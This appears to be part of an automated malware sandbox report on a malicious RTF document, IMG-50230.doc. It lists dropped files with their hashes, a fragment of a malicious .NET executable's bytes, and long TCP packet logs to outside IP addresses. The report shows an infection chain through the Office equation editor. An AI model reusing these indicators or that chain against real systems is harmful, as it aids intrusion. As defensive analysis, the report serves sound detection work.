                                                                                                                                                                                  SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: ..
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y5D8BEZV.txt
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):90
                                                                                                                                                                                  Entropy (8bit):4.31625622510561
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:jvcDcecQRNHoVZIVuv2ci2NPB3V4xFRcw3SSHvn:s6ZIVu+ci2NJ3axFBvn
                                                                                                                                                                                  MD5:4B5D34824217783F9CF0E1D146D4AFA9
                                                                                                                                                                                  SHA1:34CC2B4DD48B11D8019B2990F7C4741EE9293778
                                                                                                                                                                                  SHA-256:AEAE0A8F2B51D947D64AE9BFB899C863D6812BB6F7C3F5DBA0750846A7D958DB
                                                                                                                                                                                  SHA-512:EFD1E904D2CB8B7075498CFA5B35854670D902DC718C7902BEDB50E800029D755E28665A9587E58CE42A3FF148AD9F8768282EF193C7412FE7A11443095CD7EE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:bit.ly/
                                                                                                                                                                                  Preview: _bit.l0r5Pp-3298995411bad0e715-00a.bit.ly/.1536.1156689024.30900706.2028579048.30864572.*.
                                                                                                                                                                                  C:\Users\user\Desktop\~$G-50230.doc
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                  Entropy (8bit):2.431160061181642
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                                                  MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                                                  SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                                                  SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                                                  SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                                                  C:\Users\Public\69577.exe
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):839656
                                                                                                                                                                                  Entropy (8bit):5.8344795183177265
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:yHuICHfNbxpOHOKThJhHZ/ftciJKkEDZMfDnCEBBb8a2ong:yHuIS/OuWhJ/Vh8rCffBAn
                                                                                                                                                                                  MD5:BEB09E991A41577E79DFABC58178A44F
                                                                                                                                                                                  SHA1:88FB38266CF4DBDB6537082E0FCEDC1FF4070F59
                                                                                                                                                                                  SHA-256:80EE728FDCD057C60C2D67DDE0943F6FB227C6F521D98582843E5908E0437FF5
                                                                                                                                                                                  SHA-512:2926EBBAA31478A810B89D0A0B0024D10D405D8C561208838192374D94DF2FCFF78DD1D2BE7C75AEFA4045682DA463E31C2AD3DEE75CF40EAF27FB4CDC72774D
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z!.?.................Z...J.......x... ........@.. ....................................`..................................x..S........F...............)........................................................... ............... ..H............text....X... ...Z.................. ..`.rsrc....F.......H...\..............@..@.reloc..............................@..B.................x......H........N...)......G.................................................... :........%.....(......... .........%.....(.........*...0..........r...p(I...u............................(P...t....&.r...p(I...u....(I...u....&.....&............-R(....t....(I...u....-9....(....t................\.(P...t............(P...t....&.+k...............-K..........(P...t.... .ic..... .J..\(P...t............(I...u.............+......................+...................(....t............-......-..

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:Rich Text Format data, unknown version
                                                                                                                                                                                  Entropy (8bit):6.336603431557007
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Rich Text Format (5005/1) 55.56%
                                                                                                                                                                                  • Rich Text Format (4004/1) 44.44%
                                                                                                                                                                                  File name:IMG-50230.doc
                                                                                                                                                                                  File size:1332844
                                                                                                                                                                                  MD5:447225e0d19daba3ebaa394a72b72318
                                                                                                                                                                                  SHA1:ade2804cac4b052d9fb2af635dd2b7e4dd960853
                                                                                                                                                                                  SHA256:39e2a7aebe3542b3caf9fca72de467f409766056a29923042ec91c5140503409
                                                                                                                                                                                  SHA512:2f74b1fc9677e7dc5d9be9a51c3157a7d52c0c8b74be1c83003197333cb06e4ba08bf4a22a4001ccbcb9e38fca0050b5fe837da42a03812495215b5062e3ca15
                                                                                                                                                                                  SSDEEP:24576:xmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzms49Q8KVB:bqC
                                                                                                                                                                                  File Content Preview:{\rtf76859\page87576133526591799@QG6TZCUef77hz7vS@-yiRKBY9aGnTX9PDq8<eh&&0_M-D_g--_-d,64>36845$Cv>yt=n5|:%_>jn6%bm\mklP;=u\h86%89.65.... .... ...... .... .... ...

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                                                                                                                                                  Static RTF Info

                                                                                                                                                                                  Objects

                                                                                                                                                                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                                                                  0001389DEhno

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Jan 27, 2021 06:51:24.620235920 CET4916580192.168.2.2267.199.248.11
                                                                                                                                                                                  Jan 27, 2021 06:51:24.667917967 CET804916567.199.248.11192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:24.668248892 CET4916580192.168.2.2267.199.248.11
                                                                                                                                                                                  Jan 27, 2021 06:51:24.668931007 CET4916580192.168.2.2267.199.248.11
                                                                                                                                                                                  Jan 27, 2021 06:51:24.969619036 CET4916580192.168.2.2267.199.248.11
                                                                                                                                                                                  Jan 27, 2021 06:51:25.017587900 CET804916567.199.248.11192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:25.115094900 CET804916567.199.248.11192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:25.115402937 CET4916580192.168.2.2267.199.248.11
                                                                                                                                                                                  Jan 27, 2021 06:51:25.707030058 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:25.966017008 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:25.966172934 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:25.966811895 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.225644112 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232167006 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232237101 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232274055 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232312918 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232352972 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232388973 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232426882 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232445955 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232456923 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232490063 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232506037 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232531071 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232539892 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232574940 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232606888 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.237232924 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.491837978 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.491914034 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.491965055 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492057085 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492074966 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492111921 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492119074 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492150068 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492189884 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492222071 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492279053 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492301941 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492337942 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492382050 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492440939 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492456913 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492499113 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492512941 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492552996 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492604017 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492640972 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492667913 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492705107 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.495444059 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752238035 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752271891 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752290964 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752307892 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752325058 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752326965 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752342939 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752353907 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752357960 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752362013 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752362013 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752365112 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752377033 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752379894 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752393007 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752398968 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752419949 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752419949 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752439022 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752441883 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752450943 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752456903 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752469063 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752473116 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752490044 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752494097 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752509117 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752511024 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752526045 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752531052 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752542973 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752557993 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752563000 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752567053 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752579927 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752590895 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752597094 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752610922 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752614975 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752618074 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752630949 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752633095 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752650976 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752650976 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752667904 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752691031 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.753751993 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.011470079 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.011501074 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.011770964 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012707949 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012736082 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012762070 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012787104 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012803078 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012819052 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012825966 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012841940 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012864113 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012865067 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012886047 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012904882 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012908936 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012933016 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012948990 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012955904 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012978077 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.012984037 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013001919 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013024092 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013047934 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013067961 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013071060 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013077021 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013082027 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013086081 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013118029 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013190031 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013254881 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013272047 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013299942 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013325930 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013338089 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013350010 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013362885 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013377905 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013408899 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013423920 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013442039 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013452053 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013475895 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013494968 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013506889 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013516903 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013521910 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013547897 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013564110 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013571978 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013592958 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013609886 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013633966 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013639927 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013650894 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013672113 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.013699055 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.014869928 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.270759106 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.270792961 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.270862103 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.270890951 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272564888 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272587061 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272598982 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272610903 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272622108 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272634029 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272650003 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272669077 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272670984 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272689104 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272722960 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272733927 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272741079 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272753954 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272759914 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272779942 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272797108 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272804022 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272814035 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272814989 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272835016 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272851944 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272866011 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272867918 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272885084 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272890091 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272901058 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272918940 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272919893 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272938013 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272952080 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.272964954 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.273025036 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274025917 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274044037 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274063110 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274080992 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274101019 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274113894 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274120092 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274137020 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274139881 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274153948 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274172068 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274174929 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274188995 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274209023 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274216890 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274228096 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274243116 CET8049166177.70.106.69192.168.2.22
